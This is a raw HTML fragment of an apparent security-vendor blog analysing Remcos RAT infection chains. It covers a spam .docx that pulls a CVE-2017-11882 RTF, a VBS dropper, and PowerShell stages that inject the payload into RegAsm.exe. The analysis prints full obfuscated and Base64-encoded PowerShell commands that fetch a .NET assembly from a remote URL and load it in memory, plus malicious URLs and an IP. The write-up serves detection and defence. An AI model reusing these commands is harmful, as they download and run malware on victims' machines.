https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure22-300x17.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure22-1024x58.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure22-768x44.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure22-205x12.png 205w\" sizes=\"auto, (max-width: 1405px) 100vw, 1405px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 22: Last line of script<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">It utilizes a process injection technique to inject the final Remcos payload into the memory of RegAsm.exe, a legitimate Microsoft .NET executable.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206352\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure23.png\" alt=\"\" width=\"1702\" height=\"335\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure23.png 1702w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure23-300x59.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure23-1024x202.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure23-768x151.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure23-1536x302.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure23-205x40.png 205w\" sizes=\"auto, (max-width: 1702px) 100vw, 1702px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 23: Process Tree<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">Memory String of RegAsm.exe which shows the traces of Remcos<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206367\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure24.png\" alt=\"\" width=\"1556\" height=\"597\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure24.png 1556w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure24-300x115.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure24-1024x393.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure24-768x295.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure24-1536x589.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure24-205x79.png 205w\" sizes=\"auto, (max-width: 1556px) 100vw, 1556px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 24: Keylogger related Strings in memory dump<\/span><\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206382\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure25.png\" alt=\"\" width=\"1468\" height=\"637\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure25.png 1468w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure25-300x130.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure25-1024x444.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure25-768x333.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure25-205x89.png 205w\" sizes=\"auto, (max-width: 1468px) 100vw, 1468px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 25: Remcos related String in memory dump<\/span><\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206397\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure26.png\" alt=\"\" width=\"1472\" height=\"632\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure26.png 1472w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure26-300x129.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure26-1024x440.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure26-768x330.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure26-205x88.png 205w\" sizes=\"auto, (max-width: 1472px) 100vw, 1472px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 26: Remcos Mutex creation String in memory dump<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<h2 style=\"font-weight: 400;\"><strong>Mutex Created<\/strong><\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206412\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure27.png\" alt=\"\" width=\"1737\" height=\"295\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure27.png 1737w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure27-300x51.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure27-1024x174.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure27-768x130.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure27-1536x261.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure27-205x35.png 205w\" sizes=\"auto, (max-width: 1737px) 100vw, 1737px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 27: Mutex creation<\/span><\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">A log file is stored in the %ProgramData% directory, where a folder named &#8220;1210&#8221; is created. Inside this folder, a file called logs.dat is generated to capture and store all system logging activities.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206427\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure28.png\" alt=\"\" width=\"1537\" height=\"883\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure28.png 1537w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure28-300x172.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure28-1024x588.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure28-768x441.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure28-205x118.png 205w\" sizes=\"auto, (max-width: 1537px) 100vw, 1537px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 28: Logs.dat file to capture all keystroke activity.<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206442\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure29.png\" alt=\"\" width=\"1027\" height=\"970\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure29.png 1027w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure29-300x283.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure29-1024x967.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure29-768x725.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure29-137x129.png 137w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure29-24x24.png 24w\" sizes=\"auto, (max-width: 1027px) 100vw, 1027px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\">Figure 29: Strings in payload<\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">Finally, it deletes the original VBS sample from the system.<\/p>\n<h2 style=\"font-weight: 400;\"><strong>Variant 2 &#8211; Remcos from Office Open XML Document:<\/strong><\/h2>\n<p style=\"font-weight: 400;\">This variant of Remcos comes from Office Open XML Document. The docx file comes from a spam email as an attachment.<\/p>\n<p style=\"font-weight: 400;\"><strong>Infection Chain:<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206457\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure30.png\" alt=\"\" width=\"962\" height=\"247\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure30.png 962w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure30-300x77.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure30-768x197.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure30-205x53.png 205w\" sizes=\"auto, (max-width: 962px) 100vw, 962px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\">Figure 30: Infection Chain of variant 2<\/span><\/figcaption><\/figure>\n<p style=\"font-weight: 400;\"><strong>Email Spam:<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206472\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure31.png\" alt=\"\" width=\"935\" height=\"685\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure31.png 935w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure31-300x220.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure31-768x563.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure31-176x129.png 176w\" sizes=\"auto, (max-width: 935px) 100vw, 935px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 31: Spam Email<\/span><\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">The email displayed in the above image contains an attachment in the form of a .docx file, which is an Office Open XML document.<\/p>\n<h3 style=\"font-weight: 400;\"><strong>Analysis:<\/strong><\/h3>\n<p style=\"font-weight: 400;\">From the static analysis of .docx file, it is found that the malicious content was present in the relationship file \u201csetting.xml.rels\u201d. <strong>Below is the content of settings.xml.rels file:<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206487\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure32.png\" alt=\"\" width=\"1602\" height=\"69\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure32.png 1602w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure32-300x13.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure32-1024x44.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure32-768x33.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure32-1536x66.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure32-205x9.png 205w\" sizes=\"auto, (max-width: 1602px) 100vw, 1602px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\">Figure 32: rels file content<\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">From the above content,it is evident that it downloads a file from an external resource which points to a URL hxxps:\/\/dealc.me\/NLizza.<\/p>\n<p style=\"font-weight: 400;\">The downloaded file is an RTF document named <strong>\u201cseethenewthingswhichgivenmebackwithentirethingstobegetbackonlinewithentirethingsbackwithentirethinsgwhichgivenmenewthingsback_______greatthingstobe.doc\u201d<\/strong>which has an unusually long filename.<\/p>\n<p style=\"font-weight: 400;\">The RTF file is crafted to include CVE-2017-11882 Equation Editor vulnerability which is a remote code execution vulnerability that allows an attacker to execute arbitrary code on a victim&#8217;s machine by embedding malicious objects in documents.<\/p>\n<p style=\"font-weight: 400;\">Upon execution, the RTF file downloads a VBS script from the URL <strong>\u201chxxp:\/\/91.134.96.177\/70\/picturewithmegetbacktouse.tIF\u201d<\/strong> to the %appdata% directory, saving it as <strong>\u201cpicturewithmegetbacktouse.vbs\u201d.<\/strong><\/p>\n<p style=\"font-weight: 400;\"><strong>Below is the content of VBS file:<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206502\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure33.png\" alt=\"\" width=\"772\" height=\"871\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure33.png 772w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure33-266x300.png 266w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure33-768x866.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure33-114x129.png 114w\" sizes=\"auto, (max-width: 772px) 100vw, 772px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 33: VBS Obfuscated content<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206517\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure34.png\" alt=\"\" width=\"679\" height=\"293\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure34.png 679w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure34-300x129.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure34-205x88.png 205w\" sizes=\"auto, (max-width: 679px) 100vw, 679px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 34: VBS Obfuscated content<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">The VBScript is highly obfuscated, employing multiple layers of string concatenation to construct a command. It then executes that command using WScript.Shell.3ad868c612a6<\/p>\n<p style=\"font-weight: 400;\"><strong>Below is the de-obfuscated code:<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206532\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure35.png\" alt=\"\" width=\"965\" height=\"882\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure35.png 965w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure35-300x274.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure35-768x702.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure35-141x129.png 141w\" sizes=\"auto, (max-width: 965px) 100vw, 965px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 35: De-Obfuscated Content<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206547\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure36.png\" alt=\"\" width=\"452\" height=\"518\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure36.png 452w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure36-262x300.png 262w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure36-113x129.png 113w\" sizes=\"auto, (max-width: 452px) 100vw, 452px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 36: De-Obfuscated Content<\/span><\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">The above code shows that the VBS file launches PowerShell using Base64 encoded strings as the command.<\/p>\n<p style=\"font-weight: 400;\"><strong>Below is the 1st PowerShell command line:<\/strong><\/p>\n<p style=\"font-weight: 400;\">&#8220;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&#8221; -command $Codigo = &#8216;LiAoIChbc3RyaW5HXSR2ZXJCT1NFUFJFZmVSRU5jRSlbMSwzXSsneCctam9JTicnKSgoKCd7MH11cmwgJysnPSB7Mn1odHRwczovLycrJ3JhJysndy4nKydnaScrJ3QnKydodScrJ2J1Jysnc2VyJysnY29uJysndGVuJysndCcrJy5jb20vTm8nKydEJysnZScrJ3QnKydlYycrJ3RPbi9Ob0RldCcrJ2VjdCcrJ09uL3JlZicrJ3MnKycvJysnaGVhZHMvbWFpbi9EZXRhaCcrJ05vJysndCcrJ2gnKyctVicrJy50eHR7MicrJ307JysnIHswfWJhJysnc2UnKyc2JysnNEMnKydvbnQnKydlJysnbicrJ3QgPSAnKycoTmV3JysnLU9iaicrJ2UnKydjJysndCBTeXMnKyd0ZW0uTmUnKyd0LicrJ1dlYicrJ0MnKydsaWVudCkuRCcrJ28nKyd3bmwnKydvYScrJ2RTdHInKydpbicrJ2coJysneycrJzB9dScrJ3JsKTsgeycrJzAnKyd9JysnYmluYXJ5QycrJ29udGUnKyduJysndCA9JysnICcrJ1tTJysneXN0JysnZW0uQ28nKydudmUnKydydCcrJ10nKyc6OkYnKydyb21CYXNlNjRTdHJpbicrJ2coezB9YmFzZScrJzYnKyc0QycrJ29udGUnKydudCcrJyknKyc7IHsnKycwfScrJ2FzcycrJ2UnKydtYmx5JysnID0nKycgWycrJ1JlZmxlY3QnKydpb24uQXNzZW1ibCcrJ3ldJysnOjpMJysnbycrJ2FkKHswfWJpbicrJ2FyeUMnKydvbicrJ3QnKydlbnQpOyBbZG5saScrJ2IuSU8uSG9tJysnZScrJ106OlZBSSh7JysnMX0nKyd0JysneCcrJ3QuJysnQ1ZGR0dSLzA3Lzc3JysnMS42OS4nKyc0MycrJzEuMScrJzkvLycrJzpwJysndHRoezEnKyd9LCB7JysnMScrJ30nKydkZXNhdGl2YWRvezEnKyd9LCB7MX1kZXMnKydhdGknKyd2YWQnKydvezF9LCB7MX1kZXMnKydhdCcrJ2knKyd2YWRvezF9LCcrJyB7MScrJ31SZScrJ2dBJysncycrJ217JysnMX0sJysnIHsnKycxfXsnKycxfSwnKyd7MX17MX0pJyktZiAgW2NIYVJdMzYsW2NIYVJdMzQsW2NIYVJdMzkpICk=&#8217;;$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD<\/p>\n<p style=\"font-weight: 400;\"><strong>Base64 decoded content:<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206562\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure37.png\" alt=\"\" width=\"1806\" height=\"113\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure37.png 1806w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure37-300x19.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure37-1024x64.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure37-768x48.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure37-1536x96.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure37-205x13.png 205w\" sizes=\"auto, (max-width: 1806px) 100vw, 1806px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\">Figure 37: Base64 decoded content<\/span><\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">The above base64 decoded content is used as input to the 2nd PowerShell command.<\/p>\n<p style=\"font-weight: 400;\"><strong>Below is the 2nd PowerShell command line:<\/strong><\/p>\n<p style=\"font-weight: 400;\">&#8220;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&#8221; -windowstyle hidden -executionpolicy bypass -NoProfile -command &#8220;. ( ([strinG]$verBOSEPREfeRENcE)[1,3]+&#8217;x&#8217;-joIN&#8221;)(((&#8216;{0}url &#8216;+&#8217;= {2}https:\/\/&#8217;+&#8217;ra&#8217;+&#8217;w.&#8217;+&#8217;gi&#8217;+&#8217;t&#8217;+&#8217;hu&#8217;+&#8217;bu&#8217;+&#8217;ser&#8217;+&#8217;con&#8217;+&#8217;ten&#8217;+&#8217;t&#8217;+&#8217;.com\/No&#8217;+&#8217;D&#8217;+&#8217;e&#8217;+&#8217;t&#8217;+&#8217;ec&#8217;+&#8217;tOn\/NoDet&#8217;+&#8217;ect&#8217;+&#8217;On\/ref&#8217;+&#8217;s&#8217;+&#8217;\/&#8217;+&#8217;heads\/main\/Detah&#8217;+&#8217;No&#8217;+&#8217;t&#8217;+&#8217;h&#8217;+&#8217;-V&#8217;+&#8217;.txt{2&#8217;+&#8217;};&#8217;+&#8217; {0}ba&#8217;+&#8217;se&#8217;+&#8217;6&#8217;+&#8217;4C&#8217;+&#8217;ont&#8217;+&#8217;e&#8217;+&#8217;n&#8217;+&#8217;t = &#8216;+'(New&#8217;+&#8217;-Obj&#8217;+&#8217;e&#8217;+&#8217;c&#8217;+&#8217;t Sys&#8217;+&#8217;<a href=\"http:\/\/tem.ne\/\">tem.Ne<\/a>&#8216;+&#8217;t.&#8217;+&#8217;Web&#8217;+&#8217;C&#8217;+&#8217;lient).D&#8217;+&#8217;o&#8217;+&#8217;wnl&#8217;+&#8217;oa&#8217;+&#8217;dStr&#8217;+&#8217;in&#8217;+&#8217;g(&#8216;+'{&#8216;+&#8217;0}u&#8217;+&#8217;rl); {&#8216;+&#8217;0&#8217;+&#8217;}&#8217;+&#8217;binaryC&#8217;+&#8217;onte&#8217;+&#8217;n&#8217;+&#8217;t =&#8217;+&#8217; &#8216;+'[S&#8217;+&#8217;yst&#8217;+&#8217;<a href=\"http:\/\/em.co\/\">2024 \u2013 New<\/a> &#8216;+&#8217;nve&#8217;+&#8217;rt&#8217;+&#8217;]&#8217;+&#8217;::F&#8217;+&#8217;romBase64Strin&#8217;+&#8217;g({0}base&#8217;+&#8217;6&#8217;+&#8217;4C&#8217;+&#8217;onte&#8217;+&#8217;nt&#8217;+&#8217;)&#8217;+&#8217;; {&#8216;+&#8217;0}&#8217;+&#8217;ass&#8217;+&#8217;e&#8217;+&#8217;mbly&#8217;+&#8217; =&#8217;+&#8217; [&#8216;+&#8217;Reflect&#8217;+&#8217;ion.Assembl&#8217;+&#8217;y]&#8217;+&#8217;::L&#8217;+&#8217;o&#8217;+&#8217;ad({0}bin&#8217;+&#8217;aryC&#8217;+&#8217;on&#8217;+&#8217;t&#8217;+&#8217;ent); [dnli&#8217;+&#8217;b.IO.Hom&#8217;+&#8217;e&#8217;+&#8217;]::VAI({&#8216;+&#8217;1}&#8217;+&#8217;t&#8217;+&#8217;x&#8217;+&#8217;t.&#8217;+&#8217;CVFGGR\/07\/77&#8217;+&#8217;1.69.&#8217;+&#8217;43&#8217;+&#8217;1.1&#8217;+&#8217;9\/\/&#8217;+&#8217;:p&#8217;+&#8217;tth{1&#8217;+&#8217;}, {&#8216;+&#8217;1&#8217;+&#8217;}&#8217;+&#8217;desativado{1&#8217;+&#8217;}, {1}des&#8217;+&#8217;ati&#8217;+&#8217;vad&#8217;+&#8217;o{1}, {1}des&#8217;+&#8217;at&#8217;+&#8217;i&#8217;+&#8217;vado{1},&#8217;+&#8217; {1&#8217;+&#8217;}Re&#8217;+&#8217;gA&#8217;+&#8217;s&#8217;+&#8217;m{&#8216;+&#8217;1},&#8217;+&#8217; {&#8216;+&#8217;1}{&#8216;+&#8217;1},&#8217;+'{1}{1})&#8217;)-f [cHaR]36,[cHaR]34,[cHaR]39) )&#8221;<\/p>\n<ul style=\"font-weight: 400;\">\n<li>The PowerShell script uses string obfuscation by combining parts of strings using join and concatenation. This hides the actual URL being fetched.<\/li>\n<li>It constructs a URL that points to a raw GitHub file: hxxps:\/\/raw.githubusercontent.com\/NoDetectOn\/NoDetectOn\/refs\/heads\/main\/DetahNoth-V.txt<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\"><strong>Below is the content of \u201cDetahNoth-V.txt\u201d:<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206577\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure38.png\" alt=\"\" width=\"1884\" height=\"863\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure38.png 1884w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure38-300x137.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure38-1024x469.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure38-768x352.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure38-1536x704.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure38-205x94.png 205w\" sizes=\"auto, (max-width: 1884px) 100vw, 1884px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 38: Base64 encoded binary content<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">Below is the code snippet to decode the above Base64 string into binary format and load it into memory as a .NET assembly. This method avoids writing files to disk, which makes it harder for some security products to detect the operation.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206592\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure39.png\" alt=\"\" width=\"677\" height=\"60\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure39.png 677w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure39-300x27.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure39-205x18.png 205w\" sizes=\"auto, (max-width: 677px) 100vw, 677px\" \/><\/p>\n<figure><figcaption style=\"text-align: center; font-size: 14px; color: gray; margin-top: 8px;\"><span style=\"color: #000000;\"><span style=\"color: #000000;\">Figure 39: Code snippet to decode Base64 string<\/span><\/span>\u00a0<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p style=\"font-weight: 400;\">The decoded binary content leads to a DLL file named as \u201cdnlib.dll\u201d.<\/p>\n<p style=\"font-weight: 400;\"><strong>Below is the last part of code in the 2nd PowerShell command line:<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-206607\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure40.png\" alt=\"\" width=\"1779\" height=\"71\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/12\/Figure40.png 1779w, 